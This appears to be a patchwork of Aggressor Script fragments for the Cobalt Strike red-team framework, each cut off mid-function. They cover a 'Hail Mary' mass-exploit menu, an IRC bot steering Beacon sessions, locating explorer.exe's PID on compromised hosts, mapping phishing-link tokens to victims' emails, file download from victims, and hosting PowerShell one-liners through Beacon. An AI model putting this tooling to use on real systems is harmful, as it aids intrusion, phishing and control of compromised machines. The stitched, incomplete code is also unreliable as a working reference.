#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
sub exploitPorts {
    local('$exploit %exploits $options $port');
    foreach $exploit (modules("exploits")) {
        $options = options("exploit", $exploit);
        if ('RPORT' in $options) {

#
# This code is related to the Attacks -> Find Attacks and Attacks -> Hail Mary features
#
popup attacks {
    item "&Find Attacks" {
        spawn(&runFindAttacks);
    }
    item "&Hail Mary" {

#
# Quick/Dirty IRC Library for use with Aggressor Script
# https://www.cobaltstrike.com/aggressor-script/index.html
#
# irc_close($handle);
sub irc_close {
    println($1, "QUIT :Good bye!");
    closef($1);
}

# demonstrate an example of inversion-of-control with Aggressor Script
#
# co-routine,
sub bot {
    # run pwd and get the output.
    bpwd($bid);
    when("beacon_output_alt", $this);
    yield;

# getexplorerpid($bid, &callback);
sub getanypid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq $proc) {
                # $1 is our Beacon ID, $pid is the PID of $proc
                [$callback: $1, $proc, $pid];
            }

# getexplorerpid($bid, &callback);
sub getexplorerpid {
    bps($1, lambda({
        local('$pid $name $entry');
        foreach $entry (split("\n", $2)) {
            ($name, $pid) = split("\\s+", $entry);
            if ($name eq "explorer.exe") {
                # $1 is our Beacon ID, $pid is the PID of explorer.exe
                [$callback: $1, $pid];
            }

#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
    local('$out $now $method $uri $addr $ua $response $size $handler $when $params');

#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");
popup filebrowser {
    item "&Download" {
        local('$file');
        foreach $file ($3) {
            bdownload($1, "$2 $+ \\ $+ $file");

# host a PowerShell script on a one-off web server via Beacon.
#
# Why? Generate one-liners for length constrained command execution opportunities
#
# NOTE: this uses internal APIs and is subject to break in the next release. Don't hate!
# if there's interest in this capability, I can build an official API for it.
import common.*;
import beacon.*;